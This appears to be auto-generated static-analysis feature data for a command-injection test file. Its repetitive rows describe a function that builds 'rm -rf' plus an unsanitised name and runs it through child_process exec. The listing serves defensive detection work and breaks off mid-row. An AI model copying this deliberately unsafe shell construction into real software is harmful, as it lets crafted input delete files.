autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:3 | cp | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:3 | cp | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:8 | cp.exec | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:36 | cp.exec ... n(" ")) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:36 | cp.exec ... n(" ")) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:36 | cp.exec ... n(" ")) | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:36 | cp.exec ... n(" ")) | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:36 | cp.exec ... n(" ")) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:36 | exceptional return of cp.exec ... n(" ")) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:36 | exceptional return of cp.exec ... n(" ")) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:36 | exceptional return of cp.exec ... n(" ")) | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:36 | exceptional return of cp.exec ... n(" ")) | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:36 | exceptional return of cp.exec ... n(" ")) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:5:89:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:5:89:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:5:89:8 | exec | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:5:89:8 | exec | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:5:89:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:25 | ["rm -rf", name] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:25 | ["rm -rf", name] | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:25 | ["rm -rf", name] | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:25 | ["rm -rf", name] | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:25 | ["rm -rf", name] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:30 | ["rm -r ... e].join | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:30 | ["rm -r ... e].join | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:30 | ["rm -r ... e].join | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:30 | ["rm -r ... e].join | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:30 | ["rm -r ... e].join | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:35 | ["rm -r ... in(" ") | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:35 | ["rm -r ... in(" ") | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:35 | ["rm -r ... in(" ") | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:35 | ["rm -r ... in(" ") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:35 | ["rm -r ... in(" ") | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:35 | ["rm -r ... in(" ") | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:35 | ["rm -r ... in(" ") | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:35 | ["rm -r ... in(" ") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:35 | ["rm -r ... in(" ") | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:35 | exceptional return of ["rm -r ... in(" ") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:35 | exceptional return of ["rm -r ... in(" ") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:35 | exceptional return of ["rm -r ... in(" ") | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:35 | exceptional return of ["rm -r ... in(" ") | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:35 | exceptional return of ["rm -r ... in(" ") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:11:89:18 | "rm -rf" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:11:89:18 | "rm -rf" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:11:89:18 | "rm -rf" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:11:89:18 | "rm -rf" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:11:89:18 | "rm -rf" | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:11:89:18 | "rm -rf" | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:11:89:18 | "rm -rf" | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:11:89:18 | "rm -rf" | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:11:89:18 | "rm -rf" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:11:89:18 | "rm -rf" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:21:89:24 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:21:89:24 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:21:89:24 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:21:89:24 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:21:89:24 | name | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:21:89:24 | name | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:21:89:24 | name | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:21:89:24 | name | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:21:89:24 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:21:89:24 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:27:89:30 | join | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:27:89:30 | join | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:27:89:30 | join | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:27:89:30 | join | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:27:89:30 | join | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:32:89:34 | " " | CalleeFlexibleAccessPath | ?.join | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:32:89:34 | " " | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:32:89:34 | " " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 